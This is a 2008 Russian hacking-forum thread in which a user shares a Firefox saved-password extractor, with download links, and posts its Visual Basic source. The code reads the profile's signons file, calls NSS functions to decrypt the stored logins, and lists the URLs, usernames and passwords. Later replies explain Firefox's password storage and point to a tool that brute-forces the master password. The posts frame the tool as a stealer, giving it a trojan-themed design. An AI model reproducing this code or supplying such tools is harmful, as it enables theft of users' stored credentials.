Форум АНТИЧАТ
Страница 1 из 2 1 2 >
Показывать 40 сообщений этой темы на одной странице

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   С/С++, C#, Delphi, .NET, Asm (https://forum.antichat.xyz/forumdisplay.php?f=24)
-   -   ff p4s fuck3rz (https://forum.antichat.xyz/showthread.php?t=97131)

baltazar 20.12.2008 00:07
p4ss f1nd3r for ff3!
 
Вобщем накодил на vb небольшую софтинку,прога "вспоминает" пароли от мозиллы,высвечивает урл,логин,пасс,дату,дизайн ака "Tроя жива":( критика уместна,если норм,то доработаю,переделаю,дополн ю,жду отзывов

вот собственно линк на нее:

http://rapidshare.com/files/174956221/ff_p4s_fuck3rz.exe.html

http://dump.ru/file/1338529

http://www.x2b.ru/get/17928


Чуть не забыл,tnx 2 Exlibris & xcedz & Jes(джесу за то что он такой душка) за помощь в придумывании мегохакерского названия для программы!)


#забыл сказать,
перед запуском сохраните ваши пароли
(на всякий случай),ато некоторые уже тестировали xDD

xcedz 20.12.2008 00:22
Отлично, работает. Пасы только я не храню в фф ^^

t00th 20.12.2008 00:27
Цитата:
Сообщение от baltazar
Чуть не забыл,гратц Екслибрис и икскеду за помощь в придумывании мегохакерского названия для программы!)
Gratz, gz — (англ. Congratulations) Поздравляю! (Поздравление с чем-либо)

xcedz 20.12.2008 00:33
-----
По сабжу. Добавляй по комбинации клавиш "сохранить в" все также в таком же стиле чтобы красиво было :)

FoV 20.12.2008 15:48
А где мозила хранит пароли?

baltazar 20.12.2008 16:00
Код:
sFFPath = GetSpecialfolder(CSIDL_APPDATA) & "\Mozilla\Firefox\" & "profiles.ini"
     
    sRet = Space(260)
    Call GetPrivateProfileString("Profile0", "Path", vbNullString, sRet, 260, sFFPath)
    sRet = Left$(sRet, lstrlen(sRet))

    sFFPath = GetSpecialfolder(CSIDL_APPDATA) & "\Mozilla\Firefox\" & sRet & "\signons3.txt"
   
    Open sFFPath For Binary Access Read As #1
    sPass = Space(LOF(1))
    Get #1, , sPass
    Close #1

    sRet = GetSpecialfolder(CSIDL_APPDATA) & "\Mozilla\Firefox\" & sRet

    svEntry = Split(sPass, "." & vbCrLf)
   
    bvRet = StrConv(sRet, vbFromUnicode)
   
    If CallFunc("NSS_Init", StrPtr(bvRet)) = 0 Then
        lKeySlot = CallFunc("PK11_GetInternalKeySlot")
        If Not lKeySlot = 0 Then
            If CallFunc("PK11_Authenticate", lKeySlot, True, 0) = 0 Then
                For i = 1 To UBound(svEntry) - 1
                    svLines = Split(svEntry(i), vbCrLf)
                    Enumerate = Enumerate & " " & "URL: " & svLines(0) & vbCrLf
                    For j = 1 To UBound(svLines) - 3 Step 2
                        If Not svLines(j + 1) = "---" Then
                            Enumerate = Enumerate & " " & "Section: " & svLines(j) & vbCrLf
                            Enumerate = Enumerate & " " & "Value: " & svLines(j + 1) & vbCrLf

                            bvRet = StrConv(svLines(j + 1), vbFromUnicode)
                            Call CallFunc("NSSBase64_DecodeBuffer", 0, VarPtr(tSec), StrPtr(bvRet), Len(svLines(j + 1)))

                            If CallFunc("PK11SDR_Decrypt", VarPtr(tSec), VarPtr(tSecDec), 0) = 0 Then
                                If tSecDec.SECItemLen > 0 Then
                                    ReDim bvRet(tSecDec.SECItemLen - 1)
                                    CopyMemory bvRet(0), ByVal tSecDec.SECItemData, tSecDec.SECItemLen
                                    Enumerate = Enumerate & " " & "Data: " & StrConv(bvRet, vbUnicode) & vbCrLf
                                End If
                            End If
                        End If

_nic 20.12.2008 22:15
Мммм мозилла что действительно шифруют пароли в base64 ?

FoV 20.12.2008 22:39
_nic
нет,там другое что-то

reversys 21.12.2008 06:26
эмм, а если мастер пароль стоит - всё равно пароли вытащит?

c411k 21.12.2008 12:56
а давайте ценить свое и других время?

вопрос написали русским языком "А где мозила хранит пароли?", ты кинул сурс, но ведь можно было ответить нормально?

я не шарю в vb, но очевидно, что в profiles.ini ты берешь название папки с профилем и в той папке открываешь файл signons3.txt (криво открываешь - у меня создался пустой файл, т.к. фф2 и есть только signons2.txt). почему signons3.txt, а не signons2.txt ? мозилла 3 ? ;) так вот, погуглил бы вначале, а потом бы и изобретал велосипед. хешированные записи паролей хранятся в файлах signons*.txt, скорей всего для 3 мозиллы цифра 3, для 2 - 2, для 1 - просто signons.txt.

дальше пару цитат из перевода статьи Mikhael Felker`а "Механизмы управления паролями в IE и Firefox":

Цитата:
Структура хранилища: Текстовый файл (signons.txt)
Формат данных: ASCII, используя Base64 кодирование (кроме URL и полей)
URL (обычный текст, например www.gmail.com)
Field name (обычный текст, например username, email, userid и т.д..)
Зашифрованное и Base64 кодированное значение вышеописанной информации
Field name (например, password, pass,и т.д..)
Зашифрованное и Base64 кодированное значение вышеописанной информации
...и т.д.... (Может быть много данных для одного URL)
.
(Каждая запись заканчивается точкой)
Шифрование: TripleDES (CBC mode)
Доступ: Network Security Services (NSS) API
Требования к доступу: Авторизованный пользователь и Master Password (если установлен)
Дополнительные файлы: Сертификаты сохранены как certN.db, база данных частных ключей как keyN.db и Security Modules сохранены как secmod.db.

Firefox использует Network Security Services API для проведения криптографических операций. Поскольку это относится к менеджеру паролей, Firefox использует Public Key Cryptography Standard (PKCS) #11, который определяет API для аппаратных и программных модулей сторонних производителей. Также используется PKCS#5 для шифрования паролей. У Firefox также есть опция для использования альтернативного модуля для хранения паролей, совместимого со стандартом Federal Information Processing Standard (FIPS) 140-1. Master Password используется совместно с salt (находится в файле keyN.db) для получения Master Key. Затем Master Key используется для дешифрования имен пользователей, паролей, сохраненных в менеджере паролей.

NSS API имеет несколько функций, которые позволяют Firefox или подобным приложениям получить доступ к базе данных паролей. Установка пароля обрабатывается (PK11_SetPasswordFunc), декодируя Base64 данные (NSSBase64_DecodeBuffer) и дешифруя (PK11SDR_Decrypt), что позволяет соответствующим приложениям получить доступ к именам пользователей и соответствующим паролям. Безопасность всей системы зависит от криптографической стойкости Master Password (созданного пользователем) и доступности файла key3.db (который содержит salt), хранимого в пользовательском профиле.
у меня установлен Master Password и твоя тузла конечно же не сработала (подогнал свой signons2.txt под работоспособность твоего велосипеда).

Master Password надо брутить, брутится очень быстро. инструмент написан давно и доступен с исходниками - Firemaster.

Цитата:
Firemaster is the Firefox master password recovery tool. Firefox uses master password to protect the stored sign-on information for various websites. If the master password is forgotten, then there is no way to recover the master password and user has to lose all the sign-on information stored in it. To prevent this problem, I have developed FireMaster which uses combination of techniques such as dictionary, hybrid and brute force to recover the master password from the Firefox key database file.
ссылки по теме:

http://securityxploded.com/firemaster.php
http://securityxploded.com/firepassword.php
http://www.mozilla-russia.org/products/firefox/faq/
Механизмы управления паролями в IE и Firefox. Часть первая.
Механизмы управления паролями в IE и Firefox. Часть вторая.
http://www.mozilla.org/projects/security/pki/nss/


Время: 09:20
Страница 1 из 2 1 2 >
Показывать 40 сообщений этой темы на одной странице